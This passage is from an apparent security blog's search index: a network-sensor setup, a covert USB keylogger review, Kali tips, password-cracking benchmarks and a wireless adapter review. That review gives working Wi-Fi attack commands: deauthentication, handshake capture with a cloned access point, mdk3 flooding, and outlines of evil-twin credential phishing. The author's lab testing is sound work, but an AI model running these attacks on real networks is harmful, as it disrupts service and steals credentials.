JDK versions of Java 7 or 8 work well.\nCheck whether Java is installed: java -version\nTo install OpenJDK Java 8: sudo apt-get install openjdk-8-jdk\nDownload and Install Download the most recent build from the Releases page. At the time of writing the latest version was (v0.2). The use of deb package for Raspberry Pi or other Debian based distributions is strongly encouraged. However, the Jar file should work fine too.\nInstall package with dpkg tool: sudo dpkg -i nzyme-0.2.deb\nOnce installed the package creates multiple files and directories:\n/etc/nzyme/ - configurations with an automatically generated sample /var/log/nzyme/nzyme.log - a log file for info/error information. /usr/share/nzyme/ - contains the actual Jar file and symlinks An example of nzyme.conf file:\n# A name for this nzyme-instance. nzyme_id = nzyme-sensor-1 # WiFi interface and 802.11 channels to use. Nzyme will cycle your network adapters through these channels. # Consider local legal requirements and regulations. Default is US 2.4GHz band. # Configure one or more interfaces here. # See also: https://en.wikipedia.org/wiki/List_of_WLAN_channels channels = wlan0:1,2,3,4,5,6,7,8,9,10,11,12,13,36,40,44,48 # There is no way for nzyme to configure your wifi interface directly. We are using direct operating system commands to # configure the adapter. Examples for Linux and OSX are in the README. channel_hop_command = sudo /sbin/iwconfig {interface} channel {channel} # Channel hop interval in seconds. Leave at default if you don\u0026#39;t know what this is. channel_hop_interval = 1 # List of Graylog GELF TCP inputs. You can send to multiple, comma separated, Graylog servers if you want. graylog_addresses = 192.168.1.113:12201 # There are a lot of beacon frames in the air. A sampling rate of, for example, 20, will ignore 19 beacons # and only send every 20th to Graylog. Use this to reduce traffic. Set to 0 to disable sampling. beacon_frame_sampling_rate = 0 All that needs to be changed is the interface device, if you\u0026rsquo;re using something other than wlan0, and graylog_addresses which corresponds to the graylog server address. You can also change channels to suite your country\u0026rsquo;s regulatory standards. The channels will hop on both 2.4GHz and 5GHz frequencies.\nTo start, stop, or check status about the service:\nsudo systemctl start nzyme sudo systemctl stop nzyme sudo systemctl status nzyme To enable the service to start automatically on boot: sudo systemctl enable nzyme\nSample Output Example of Graylog running for :\nNotes When navigating through the Graylog Web Interface, there may be some warning messages: \u0026ldquo;Could not update field graph data\u0026rdquo; or \u0026ldquo;Updating field graph data failed\u0026rdquo;. I think those are down to the ElasticSearch configuration, which others have also experienced: community.graylog.org. You could change the update rate to every 30 minutes.\nA big thanks to Lennart Koopmann for creating and sharing this useful wireless tool.\n","permalink":"https://markuta.com/how-to-set-up-nzyme-and-graylog/","title":"How to Set up Nzyme and Graylog"},{"categories":null,"contents":"Since last April in 2016, the main BBC Homepage has been accessible only via HTTPS, which I thought was a good step forward, heading in the right direction. However, most pages or URLs still use insecure HTTP. Trying to navigate to a page while manually typing HTTPS in the browser address bar will force a 301 re-direct to HTTP.\nHere\u0026rsquo;s an example of cURL while navigating to /news/ path:\n$ curl -IL https://www.bbc.co.uk/news/technology HTTP/1.1 301 Moved Permanently Content-Type: text/html Date: Sun, 19 Nov 2017 22:53:22 GMT Location: http://www.bbc.co.uk/news/technology Connection: Keep-Alive Content-Length: 0 HTTP/1.1 200 OK Server: Apache Content-Type: text/html; charset=utf-8 X-News-Data-Centre: telhc Content-Language: en-GB X-PAL-Host: pal193.back.live.telhc.local:80 X-News-Cache-Id: 19441 Content-Length: 212175 Date: Sun, 19 Nov 2017 22:53:23 GMT Connection: keep-alive Set-Cookie: BBC-UID=c50curl/7.56.0; expires=Thu, 18-Nov-21 22:53:23 GMT; path=/; domain=.bbc.co.uk Cache-Control: private, max-age=30, stale-while-revalidate X-Cache-Action: MISS X-Cache-Age: 0 X-LB-NoCache: true Vary: X-CDN,X-BBC-Edge-Cache,Accept-Encoding The /news/ path and Homepage are probably the most visited in terms of network traffic compared to other aspects of the site, linking from various external sources (social media, news outlets, companies). It is strange to why they enabled HTTPS on their Homepage, and not every where else. It would of been good idea to create a beta version of news site for users to participate, which only allowed secure connections so that they can fine tune server configurations and learnt from data being collected.\nMore information is available from the BBC\u0026rsquo;s Internet blog. An interesting post by Lead Technical Architect, Paul Tweedy, entitled: Enabling Secure HTTP for BBC Online (July, 2016).\nIt goes on to state the progress being made and also challenges faced for such large website.\nTechnical \u0026amp; contractual changes to CDN (Contend Delivery Networks) partners. Impact of addition TLS encryption on CPU load and other computer resources Internal software changes (back-end development) Device support; Smart TV, iPlayer, Mobile, etc\u0026hellip; One user comments about the recent \u0026ldquo;Travel News\u0026rdquo; in the article:\nThere\u0026rsquo;s a slight irony of implementing HTTPS on the travel site when the proposed closure of that section of the BBC website was announced a few months ago. - Keith\nIt has been over 16 months since that article was posted by Paul Tweedy. We\u0026rsquo;re almost in 2018 and one of the most visited parts of BBC Online site still forces users to use insecure HTTP.\nRelated news Hacker News: How the BBC News website has changed over the past 20 years (November, 2017)\n","permalink":"https://markuta.com/https-for-news-on-bbc-online/","title":"Enable HTTPS for News on BBC Online"},{"categories":null,"contents":"Whilst studying at University I became interested in hardware keyloggers, and so decided to purchase one for a research paper. This device is specifically for wired USB keyboards (non Wi-Fi or Bluetooth) which records every single key stroke typed, without the need for drivers or worrying about any security product. I thought why not write a review and share some interesting findings.\nI DO NOT condone or encourage the use of any such devices for ILLEGAL purposes.\nFor those of you who are thinking - Why would you connect it to a laptop? - I currently do not have a tower computer, so I decided to use what I had available, my laptop and a Logitech USB keyboard. No disassembly or reverse engineering was attempted, at this time.\nThe Device The KeyGrabber Nano keylogger device is the smallest USB hardware keylogger available on the market. The Nano, as the name suggests, has the dimensions of just: 35mm (L) x 20mm (H) x 12mm (W). There are two versions; one with Wi-Fi and the other without Wi-Fi. This review is based on the (non Wi-Fi edition) which is currently available from US for $55.99 or EU for €51.99. Other locations may vary in prices, due to shipping and packages. The company which sells it are called \u0026lsquo;KeeLog\u0026rsquo; in (EU) and \u0026lsquo;Aqua Electronics Inc\u0026rsquo; in (US).\nMost typical hardware keyloggers are somewhat noticeable and rather bulky, even though they\u0026rsquo;re often out of sight and fitted to back of systems. With a quick glance those can be seen from a mile away.\nHere\u0026rsquo;s the device compared to a British Five Pence Coin:\nFeatures Compact and Discrete Memory capacity (16 MB) flash file system Compatible with all USB keyboards (including Linux \u0026amp; Mac) Transparent to computer operation, undetectable for security scanners No software or drivers required and operating system independent Memory protected with strong 128-bit encryption Quick and easy national keyboard layout support Support The device supports most wired USB type keywords including backlit and non-backlit models, power ratings 4.5V – 5.5V DC (from USB port). As this is a hardware keylogger it works on all operating systems; Windows, Mac OS, Linux with no issues. I\u0026rsquo;ve tested USB versions 2.0 and 3.0, which works perfectly. Here\u0026rsquo;s an example of my Logitech K740 illuminated keyboard (Power rating 5V == 300mA) connected to a Debian system, both with and without the device.\nOutput of dmesg:\nWith device on USB 3.0 port ... [ 144.384517] usb 1-1: new full-speed USB device number 6 using xhci_hcd [ 144.531879] usb 1-1: New USB device found, idVendor=046d, idProduct=c318 [ 144.531893] usb 1-1: New USB device strings: Mfr=1, Product=2, SerialNumber=0 [ 144.531903] usb 1-1: Product: Logitech Illuminated Keyboard [ 144.531912] usb 1-1: Manufacturer: Logitech [ 146.694372] input: Logitech Logitech Illuminated Keyboard as /devices/pci0000:00/0000:00:14.0/usb1/1-1/1-1:1.0/0003:046D:C318.0001/input/input12 [ 146.752576] hid-generic 0003:046D:C318.0001: input,hidraw0: USB HID v1.11 Keyboard [Logitech Logitech Illuminated Keyboard] on usb-0000:00:14.0-1/input0 [ 146.753391] input: Logitech Logitech Illuminated Keyboard as /devices/pci0000:00/0000:00:14.0/usb1/1-1/1-1:1.1/0003:046D:C318.0002/input/input13 [ 146.812373] hid-generic 0003:046D:C318.0002: input,hiddev0,hidraw1: USB HID v1.11 Device [Logitech Logitech Illuminated Keyboard] on usb-0000:00:14.0-1/input1 ... Without device on USB 3.0 port ... [ 392.120268] usb 1-1: new full-speed USB device number 8 using xhci_hcd [ 392.266333] usb 1-1: New USB device found, idVendor=046d, idProduct=c318 [ 392.266347] usb 1-1: New USB device strings: Mfr=1, Product=2, SerialNumber=0 [ 392.266357] usb 1-1: Product: Logitech Illuminated Keyboard [ 392.266365] usb 1-1: Manufacturer: Logitech [ 392.274911] input: Logitech Logitech Illuminated Keyboard as /devices/pci0000:00/0000:00:14.0/usb1/1-1/1-1:1.0/0003:046D:C318.0003/input/input14 [ 392.334189] hid-generic 0003:046D:C318.0003: input,hidraw0: USB HID v1.11 Keyboard [Logitech Logitech Illuminated Keyboard] on usb-0000:00:14.0-1/input0 [ 392.339795] input: Logitech Logitech Illuminated Keyboard as /devices/pci0000:00/0000:00:14.0/usb1/1-1/1-1:1.1/0003:046D:C318.0004/input/input15 [ 392.397846] hid-generic 0003:046D:C318.0004: input,hiddev0,hidraw1: USB HID v1.11 Device [Logitech Logitech Illuminated Keyboard] on usb-0000:00:14.0-1/input1 ... As you can tell it\u0026rsquo;s completely transparent to the OS.\nDifferent Keyboard Layouts There are a total of 48 different national keyboard layouts supported. This is an important aspect if you\u0026rsquo;re considering using the device in different countries. The layouts ensure each key stroke is processed and stored correctly. This option is not enabled by default, but can be easily changed by updating the configuration file to match a chosen keyboard layout.\nBelow is a list of all supported languages and layouts:\nEach folder contains a filename called layout.usb which is placed onto the root of the USB. In addition, the configuration file needs to be updated with the setting: DisableLayout=No. The full and updated list can be downloaded from here.\nConfiguration The device can be configured through the config.txt file located on the root of the USB. Data Storage mode must be activated to either view or edit the files. The most relevant parameters are listed below:\nParameter | Values | Example | Description Password | 3-character password (default KBS) | Password=SVL | Three-character key combination for activating Flash Drive mode. Encryption | Yes, No (default) | Encryption=No | Flash drive AES encryption LogSpecialKeys | None, Medium (default), Full | LogSpecialKeys=Full | Special key logging level. DisableLogging | Yes, No (default) | DisableLogging=Yes | Keystroke logging disable flag. DisableLayout | Yes, No (default) | DisableLayout=Yes | National layout disable flag.\nData Storage Mode The storage mode is activated when a 3-key combination is in typed simultaneously through a connected USB keyboard. Once pressed a new 16MB storage device will pop-up entitled \u0026ldquo;KEYGRABBER\u0026rdquo; and the keyboard will stop functioning, unless it\u0026rsquo;s reconnected. The default secret key combination is (K + B + S). This can be changed to any 3 characters given their unique from a typical keyboard layout by editing the Password parameter within the configuration file.\nExample output of log.txt (LogSpecialKeys set to Medium):\n[Pwr]example.com[Ent] news.ycombinator.com[Ent] [Bck][Bck][Bck][Bck][Bck][Bck][Bck][Bck][Bck][Bck][Bck][Bck][Bck][Bck][Bck][Bck][Bck][Bck][Bck]google.com[Ent] [Alt][Tab][Win][Tab][Win][Tab][Win][Tab][Win][Tab][Win][Tab][Win][Tab]example[Ent] sb[Pwr][Cap]g[Cap]reat for getting [Cap]bios p[Cap]asswords ()[Cap]*[Ent] [Ent]p$ssw0rd123%`[Ent] [Ent][Tab]qwertyuiop[][Ent] [Cap]asdfghjkl;\u0026#39;#[Ent] \\zxcvbnm,./[Ent] [F6][F5][Esc][F11][F11]sb Encryption In addition to a secret key, there\u0026rsquo;s also an option to enable 128-bit AES encryption to \u0026ldquo;protect\u0026rdquo; against device tampering. However, it is let down by the password combination as mentioned below. This option is disabled by default but can be enabled by editing the config.txt file and setting Encryption=Yes. Doing so will also re-format and purge logged data.\nDrawbacks Reading the log file may become confusing for none technical users, due to the fact the device records raw keyboard entries, especially when the LogSpecialKeys=Full option is selected. The device does come with software called \u0026lsquo;KL Tools\u0026rsquo; which assists users in configuring and viewing recorded data by using an intuitive GUI. However, others may prefer writing their own phrasing scripts.\nEncryption option and password key. The biggest drawback is the 3-key secret password. For example, assume a password uses [a-z] characters, that would leave a keyspace of only 26 x 25 x 24 = 15,600. The keys also need to be entered simultaneously. So, if the password is KBS, any permutation of that will activate storage mode e.g. (SBK or BSK) lowering the keyspace even further. All it would take is a modified HID device connected to the keylogger to perform a simple dictionary attack, regardless whether encryption option is enabled or not.\nWhile a USB keyboard is attached, part of the USB male connector is exposed (as shown in the first photograph). It would\u0026rsquo;ve of been much cleaner if it had a completely \u0026lsquo;flush\u0026rsquo; finish.\nSummary The main advantages are its size and support for multinational keyboard layouts. I really do like the unique storage mode activation by way of a 3-key password combination. However, it would\u0026rsquo;ve been a much better solution to allow a longer password entered in sequence, that would recognize by pattern and then enter into storage mode. Although, I don\u0026rsquo;t think there\u0026rsquo;s much information to be obtained for any investigative purposes, possibly file Metadata. Regardless it\u0026rsquo;s an issue a user should be aware of if a device were to be found.\nThe KeyGrabber Nano is no doubt an interesting device that I\u0026rsquo;ve had much fun playing around with. If you are seeking a small covert USB keylogger device this would be my first choice. I really would\u0026rsquo;ve liked to try out the Wi-Fi version, if only the cost wasn\u0026rsquo;t so high. In a future post, I may show a brute-force attack against the device using a Rubber Ducky USB (HID).\n","permalink":"https://markuta.com/keygrabber-nano-usb-keylogger-review/","title":"KeyGrabber Nano USB Keylogger Review"},{"categories":null,"contents":"UPDATE: Kali Team have migrated to a new Kernel Version I\u0026rsquo;ve tested the new kernel 4.12.13-1kali2 and can confirm it fixes issues with my wireless card. I\u0026rsquo;d advise people to update their packages and use this kernel. I\u0026rsquo;ll keep this page as it\u0026rsquo;s still a useful guide on how to downgrade for falling back on an other kernel. More info available: https://pkg.kali.org/pkg/linux\nAs you may of heard the recent 4.12.6-1kali1 kernel version broke functionality on most wireless devices, resulting in serious performance and range issues making devices almost unusable. I also noticed my wireless card getting rather hot warm for my liking.\nHere are some of the error messages in dmesg produced on the current Kernel while in monitoring mode:\nThe range also drops dramatically, where I couldn\u0026rsquo;t even monitor traffic 3 meters away from my access point.\nHow to Downgrade back to Kernel 4.11 Here is a quick way of installing the previous working kernel linux 4.11.6-1kali1 that\u0026rsquo;ll resolve wireless device issues until a patch is released. The same version is used in the AWUS052NH card review.\nHead over to: https://http.kali.org/kali/pool/main/l/linux/\nFind 4.11.6-1kali1 and download your architecture for example 64-Bit Intel or AMD CPUs would be: linux-image-4.11.0-kali1-amd64_4.11.6-1kali1_amd64.deb\nInstall the .deb package with dpkg: dpkg -i linux-image-4.11.0-kali1-amd64_4.11.6-1kali1_amd64.deb\nReboot the system. During the initial boot process select Advanced options from the GRUB menu and the kernel version we\u0026rsquo;ve just installed: After booting the wireless device should work as before the update.\n","permalink":"https://markuta.com/kali-linux-kernel-4-12-wireless-problems/","title":"Kali Linux Kernel 4.12 Wireless Problems"},{"categories":null,"contents":"Reload bash_profile Apply any changes made to ~/.bash_profile with reload: alias reload='source ~/.bash_profile'\nNetwork Connections List all network connections with nets: alias nets='lsof -i'\nInternet Speed test Speed test using a 100Mbyte file from OVH Hosting:\nalias speedtest=\u0026#39;curl -o /dev/null http://ovh.net/files/100Mio.dat\u0026#39; WAN IP Address Show WAN IP address with myip: alias myip='curl ifconfig.co'\nWeb Server Banner A curl function to grab web server banner information with headers followed by a URL:\nheaders () { /usr/bin/curl -X GET -I -L -k -A \u0026#39;Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36\u0026#39; $@ ; } Website HTML Source A curl function to view a web page\u0026rsquo;s html source with view-source followed by a URL:\nview-source () { /usr/bin/curl -L -k -A \u0026#39;Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0\u0026#39; $@ ; } File Header View the first few bytes of any file with filehead followed by a filename:\nfilehead () { /usr/bin/xxd -u -g 1 $@ | /usr/bin/head ;} List and Directory alias cp=\u0026#39;cp -iv\u0026#39; alias mv=\u0026#39;mv -iv\u0026#39; alias mkdir=\u0026#39;mkdir -pv\u0026#39; alias ll=\u0026#39;ls -FGlAhp\u0026#39; alias less=\u0026#39;less -FSRXc\u0026#39; alias CD=\u0026#39;cd\u0026#39; alias cd..=\u0026#39;cd ../\u0026#39; alias ..=\u0026#39;cd ../\u0026#39; alias ...=\u0026#39;cd ../../\u0026#39; alias ....=\u0026#39;cd ../../../\u0026#39; alias .....=\u0026#39;cd ../../../../\u0026#39; alias ~=\u0026#39;cd ~\u0026#39; alias c=\u0026#39;clear\u0026#39; Combined Just copy and paste within your ~/.bash_profile or ~/.bashrc and run source.\n# Reload alias reload=\u0026#39;source ~/.bash_profile\u0026#39; # Network alias nets=\u0026#39;lsof -i\u0026#39; alias myip=\u0026#39;curl ifconfig.co\u0026#39; alias speedtest=\u0026#39;curl -o /dev/null http://ovh.net/files/100Mio.dat\u0026#39; # Server Headers headers () { /usr/bin/curl -X GET -I -L -k -A \u0026#39;Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36\u0026#39; $@ ; } # View Page Source view-source () { /usr/bin/curl -L -k -A \u0026#39;Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0\u0026#39; $@ ; } # File Header filehead () { /usr/bin/xxd -u -g 1 $@ | /usr/bin/head ;} # Common alias cp=\u0026#39;cp -iv\u0026#39; alias mv=\u0026#39;mv -iv\u0026#39; alias mkdir=\u0026#39;mkdir -pv\u0026#39; alias ll=\u0026#39;ls -FGlAhp\u0026#39; alias less=\u0026#39;less -FSRXc\u0026#39; alias CD=\u0026#39;cd\u0026#39; alias cd..=\u0026#39;cd ../\u0026#39; alias ..=\u0026#39;cd ../\u0026#39; alias ...=\u0026#39;cd ../../\u0026#39; alias ....=\u0026#39;cd ../../../\u0026#39; alias .....=\u0026#39;cd ../../../../\u0026#39; alias ~=\u0026#39;cd ~\u0026#39; alias c=\u0026#39;clear\u0026#39; ","permalink":"https://markuta.com/useful-bash-shell-aliases/","title":"A Few Handy Bash Shell Aliases"},{"categories":null,"contents":"Lets face it remembering passwords for dozens of sites is a pain which is why some people re-use their password or change it very slightly to avoid the hassle. If you\u0026rsquo;re one of those who would rather generate random complex passwords for each site, the question on how those are stored will arise. Storing passwords in plaintext text file on your desktop is a big no no.\nPassword Managers are great, when they\u0026rsquo;re implemented correctly. I\u0026rsquo;m personally not a fan of cloud based password managers due to privacy concerns and not knowing how exactly all my passwords are actually stored and handled. When my own machine gets compromised, that\u0026rsquo;ll be down to me not properly configuring or following best security practices, but when its out of my control it\u0026rsquo;s and knowing that I took every necessary step to ensure my data is safe, and yet still, somehow all \u0026ldquo;keys to my castle\u0026rdquo; get comprised or leak information. I\u0026rsquo;d prefer to not risk any chances and can do without Cloud services or proprietary software.\nA list of Password Management services that have been compromised or do stuff that\u0026rsquo;ll make you worry:\nOneLogin - Breached 1 1Password - Leaking Data 2 LastPass - Security Breached 2015 3, Security Issue 2016 4 List of other password managers: https://en.wikipedia.org/wiki/List_of_password_managers\nKeepassXC As stated on their website, KeepassXC is a community fork from KeePassX, a native cross-platform port of KeePass Password Safe repository. It is developed in C++ and runs natively on all three supported platforms (Linux, Windows and Mac OS). The interface is simple and straight forward to use, I personally think icons may be improved.\nA really nice Setup Guide can be found: https://sts10.github.io/2017/06/27/keepassxc-setup-guide.html\nLocked Window Unlocked Window Password Generator What works for me By far the most relevant aspects to me are:\nYour wallet works offline and requires no Internet connection. I\u0026rsquo;m in full control of my password manager. Cross-platform support; Linux, Unix, Mac OS and Windows. Open Source - code review and option to implement custom features :) Support for additional authentication methods (Yubi-key, Keyfile) Cracking the Encrypted Database Like with any other security application, I\u0026rsquo;m always curious on how it handle certain situations, one of those things is the way in which KeePassXC encrypts the main database file.\nWhat if an adversary has a copy of your encrypted database, how difficult would be cracking it?\nWell, that depends on your master key of course. Not to mention any additional protection (key file or Challenge response) you\u0026rsquo;ve got set up.\nBased on Hashcat benchmark test data provided by Jeremi Gosney which was running on a dedicated password crunching monster the Sagitta Brutalis. A system featuring x8 Nvidia GTX 1080 Ti FE GPUs and x2 8-core Intel E5-2600 v4 Xeons for only $21,169.00 - base price.\nThe table below shows cracking performance against three other password managers using only the master password and their algorithms which are currently supported by Hashcat 3.5.0-22-gef6467b. The speed result is the combined power of the eight GPU cards and not of an individual card.\nHashtype Speed (kH/s) 1Password, cloudkeychain 137.7 kH/s KeePass 1 (AES/Twofish) and KeePass 2 (AES) 1733.4 kH/s Password Safe v2 4024.7 kH/s Password Safe v3 15378.8 kH/s LastPass + LastPass sniffed 29242.3 kH/s 1Password, agilekeychain 40477.9 kH/s 1Password (cloudkeychain) performed surprisingly really well, resulting in roughly about 10 times more computationally difficult to process than KeePass (AES). Keep in mind, KeePass and many others allow users to include an additional authentication method such as Key File and Challenge-Response, without which no adversary can crack.\nPassword Manager OneLogin hit by data breach; BBC\u0026#160;\u0026#x21a9;\u0026#xfe0e;\n1Password Leaks Your Data; myers.io\u0026#160;\u0026#x21a9;\u0026#xfe0e;\nLastpass Breached; nakedsecurity.sophos.com\u0026#160;\u0026#x21a9;\u0026#xfe0e;\nLastpass Vulnerability (Fixed); labs.detectify.com\u0026#160;\u0026#x21a9;\u0026#xfe0e;\n","permalink":"https://markuta.com/my-password-management/","title":"What I Use for Password Management"},{"categories":null,"contents":"The Alfa AWUS052NH is a high-performance Dual-Band (2.4GHz and 5GHz) wireless USB adapter. It\u0026rsquo;s based on the MediaTek RT3572 chipset that supports IEEE 802.11 a/b/g/n standards with up to 300Mbps transfer speeds, it\u0026rsquo;s Alfa\u0026rsquo;s third device in their 802.11abgn USB product range and has been available since March 2015 which costs around £47 or $60 depending on where you buy it.\nThis review is geared towards a person with an interest in wireless network security or penetration testing who are contemplating on a purchase, as well as any tech enthusiast. I\u0026rsquo;ll briefly touch on some attacks too. Please don\u0026rsquo;t hesitate to get in contact if I\u0026rsquo;ve missed anything.\nUPDATE: Kali Linux (kernel 4.12.6) has issues with wireless cards. There seems to be an issue with the recent 4.12.6-1kali1 kernel update which caused really poor performance on a lot of wireless devices. I\u0026rsquo;ve re-tested on older kernel 4.11.6-1kali1 and it worked fine, I\u0026rsquo;ve written a quick How-to Downgrade tutorial for falling back to an older kernel. Update [2] Kali Linux has migrated to a new kernel 4.12.13-1kali2 which fixes wireless issues at least for this card.\nDevice Specification Photograph of a setup I previously had, not the current I\u0026rsquo;ll be testing with. From left to right; Alfa Wireless device, Raspberry Pi 2, Anker Battery and Macbook pro.\nDescription Value Frequencies 2.4GHz and 5GHz Standards 802.11 a/b/g/n Chipset MediaTek RT3572 MIMO 2x2:2 Wireless Security WEP, WPA/2, 802.11X \u0026amp; WPS Operating Modes IBSS, managed, AP, monitor, WDS, mesh point Radio Antenna Two 5dBi detachable antennas with RP-SMA male connectors Power Output Tx-Power b/g:30dBm* a:27dBm* Connector Type Mini-USB to USB 2.0 Type A Inside the package:\nAlfa AWUS052NH wireless device (includes a clipper) Two 5dBi Dipole Antennas Mini-USB to USB 2.0 Type A Y cable (for providing extra power) Instruction Manual Driver CD Setup I\u0026rsquo;ve tried to simulate an attacker\u0026rsquo;s environment with the first three were the main components:\nLaptop running Kali Linux Light 4.11.0-kali1-amd64 on VMware Fusion and Mac OS host machine wireless network card. Linksys E2500 Wireless Router (IEEE 802.11 a/b/g/n) running Tomato by Shubby firmware for better configuration options and other advanced features. Alfa Wireless Network USB Card. Mobile devices that have dual-band support. Tools \u0026amp; Attacks Tested The tests were performed on the latest default Kali Linux driver for RT3572 chipsets (rt2800usb driver).\nTested 2.4GHz 5GHz Notes airodump-ng yes yes 2.4GHz and 5GHz monitoring and sniffing worked really well. aireplay-ng yes yes* deauth attack works on both bands. packet injection shows it works with -D option, however more tests are required. airbase-ng yes yes worked very well. wireshark yes yes no issues analyzing packets while in live monitor mode. kismet yes yes no issues. mdk3 yes yes* deauth attacks works well, may reset access points. evil-twin yes yes no issues. captive portal yes yes no issues. airodump-ng Performed very well at passive scanning on both bands, I was able to successfully capture four-way handshakes, channel hop, probe access points and reveal hidden ones too. I\u0026rsquo;ve always maintained a strong connection and never had any drop out issues.\nScanning 5GHz frequencies --band a or --channel 36-165 while channel hopping may display (-1), this can be easily resolved by selecting a specific channel rather than channel hopping. The --ignore-negative-one doesn\u0026rsquo;t seem to help either.\naireplay-ng Running an aireplay-ng test on b/g (2.4GHz) band works really well, supports packet injection and deauth attacks right out of the box, which is expected, results:\nroot@Kali:~# aireplay-ng --test -e XXXXXX -a 20:AA:XX:XX:XX:XX wlan0mon 13:46:18 Waiting for beacon frame (BSSID: 20:AA:XX:XX:XX:XX) on channel 1 13:46:18 Trying broadcast probe requests... 13:46:18 Injection is working! 13:46:20 Found 1 AP 13:46:20 Trying directed probe requests... 13:46:20 20:AA:XX:XX:XX:XX - channel: 1 - \u0026#39;XXXXXX\u0026#39; 13:46:21 Ping (min/avg/max): 1.458ms/16.169ms/34.363ms Power: -8.07 13:46:21 30/30: 100% Unfortunately, aireplay-ng wasn\u0026rsquo;t capable of packet injection on 5GHz frequencies, which is a shame. Running the same test under a specific 5GHz channel (40) with iwconfig wlan0mon channel 40 beforehand failed, results:\nroot@Kali:~# aireplay-ng --test -e XXXXXX-5G -a 20:AA:XX:XX:XX:XX wlan0mon 13:49:56 Waiting for beacon frame (BSSID: 20:AA:XX:XX:XX:XX) on channel 40 13:50:06 No such BSSID available. Wait what? By giving the -D override AP detection, -a access point BSSID and -e access point ESSID options the test was able to complete, I\u0026rsquo;m a bit skeptical on this as I\u0026rsquo;ve read aircrack-ng 5GHz injection isn\u0026rsquo;t supported properly, anyway here were the results:\n{: .center-image }\nDe-authentication on 5GHz works! Tested on a client connected to the target access point on channel 48 using 802.11an (40MHz) in range immediately lost connection. Options used -D override AP detection, -a access point BSSID, -c client MAC address and -e access point ESSID, results:\n{: .center-image }\nAn unusual de-authentication method found when using --fakeauth, the key here is to use -h option to change the Alfa device MAC address to a client\u0026rsquo;s one which is already associated with a access point, after a few packets the access point sends a deauthentication packet to both us and the real client, results:\nroot@kali:~# aireplay-ng -D --fakeauth 6000 -o 1 -q 10 -a 20:AA:XX:XX:XX:XX \\ -h E0:F8:XX:XX:XX:XX -e XXXXXX-5G wlan0mon {: .center-image }\nairbase-ng Create a fake access point for capturing handshakes. Devices with saved profiles will most likely try to connect a better signal network. This attack is specifically useful when it\u0026rsquo;s just the client as only three packets are needed to launch a dictionary attack on the handshake (BSSID, Anonce \u0026amp; Snonce + MIC). The following shows the options used to create the clone listening on channel 44:\nroot@Kali:~# airbase-ng -c 44 -e \u0026#34;XXXXXX-5G\u0026#34; -a 20:AA:XX:XX:XX:XX -W 1 -Z 2 \\ -n 484024ace58c73f81692083e987ed9bd33fa5ddf148a6d35181c38f59447e2dc wlan0 The -Z 2 (WPA2 TKIP) option was the best suited in this attack as -Z 4 (WPA2 CCMP) had difficulties retrieving the 2nd part of the four-way handshake and lead to client having to re-enter their password (not stealthy). One interesting option -n sets a specific Anonce value rather than having one randomly generated, this could be a useful aspect for future debugging and testing purposes.\nFor this attack to be successful it\u0026rsquo;s important the client actually knowns the correct password, otherwise you\u0026rsquo;ll waste time cracking a wrong password.\nwireshark Analyzing network packets with wireshark. I was able to view live packets, in this particular case the first two messages of the four-way handshake as well as the custom Anonce, previously setup by airbase-ng, results:\nA few other useful filters:\nGet (1/4) of four-way handshake: wlan_rsna_eapol.keydes.mic contains 0:0 Get (1/4) of four-way handshake TKIP only: eapol.keydes.key_info == 0x0089 Get (2/4) of four-way handshake TKIP only: eapol.keydes.key_info == 0x0109 Get Frames by specific Anonce or Snonce: wlan_rsna_eapol.keydes.nonce contains 48:40:24 kismet My second choice when it comes to network sniffers or monitors. It performed very well in identifying networks on both bands. I didn\u0026rsquo;t test any plugins or intrusion detection capabilities but I\u0026rsquo;m sure there is no reason for them not to work.\nmdk3 A really noisy method that cripples an access point by connecting thousands of fake client devices which completely destroys the network, in some cases reseting the router. Tests revealed using the following option was difficult to capture handshakes:\nmdk3 wlan0mon a -a 20:AA:XX:XX:XX:XX -m E0:F8:XX:XX:XX:XX\nThe de-authentication attack (d option) on the 5GHz 802.11a/n does work. Tested with 802.11a 20MHz + 40MHz, and 802.11an with 20MHz + 40MHz on channels 36, 40, 44 and 48. The de-authentication attack on 2.4GHz band works too.\nmdk3 wlan0mon d -b blacklist.txt -c 40 The file blacklist.txt contains a list of BSSID addresses.\nevil-twin The evil-twin attack makes use of hostapd, dnsmasq and iptables rules if one plans to phish out credentials. This attack focuses heavily around the hostapd program, for basic functionality a wireless interface card must support AP operating mode, since almost all wireless cards support this mode there were no issues configuring a clone access point to perform our pentesting tasks.\nIt was also possible to perform a simulated attack against the WPA2 Enterprise 802.11X standard on both bands. The attack itself relies on a patched version of hostapd called hostapd-wpe which will capture the challenge submitted by a user if they decide to accept an attacker\u0026rsquo;s supplied certificate.\ncaptive-portal Much like evil-twin attack, with additional iptables rules for forwarding traffic and a web server to serve a fake captive-portal page. This attack works really well when clients use hotspot assistant software such as Macs \u0026lsquo;Captive Network Assistant\u0026rsquo; or enable auto-connect features. They\u0026rsquo;ll be asked to provide login credentials in order to proceed for example \u0026lsquo;BT-with-FON\u0026rsquo; wi-fi hotspots found all over Europe.\nNo special configuration needed as it only requires a device with AP mode.\nMiscellaneous Adjusting TX-power output. I was able to achieve 30dBm (bg) and 27dBm (a) specific to each channel by changing country regulatory settings, be sure that is legal under your country\u0026rsquo;s telecommunication laws.\nPairing the wireless device such as a Raspiberry Pi 2 on its own will not work. The RPi2 doesn\u0026rsquo;t provide enough juice to power the ALFA device that\u0026rsquo;s why in the first photograph above it\u0026rsquo;s being powered by a battery pack, it\u0026rsquo;s also the reason they supply a USB Y cable.\nDetachable antennas is a real nice feature, even though the writer didn\u0026rsquo;t make use of this it\u0026rsquo;s still an important aspect all external wireless devices should have.\nSummary The ALFA AWUS052NH wireless USB device, or what I like to referrer it as \u0026rsquo;the Orange One\u0026rsquo; is another great product from Alfa Networks. Its Dual-Band monitoring and sniffing capabilities are a treat to have, more so when considering it\u0026rsquo;s power output compared to other devices on the market. The most surprising aspect about this card was the aireplay-ng test with -D option, without which I couldn\u0026rsquo;t even perform a simple de-authentication attack. Overall I can confidently say this device supports passive and active attacks on both bands, as I was able to attack the following; WPA/2 (TKIP), WPA/2 (CCMP), WPA2-Enterprise security standards. The 802.11ac standard 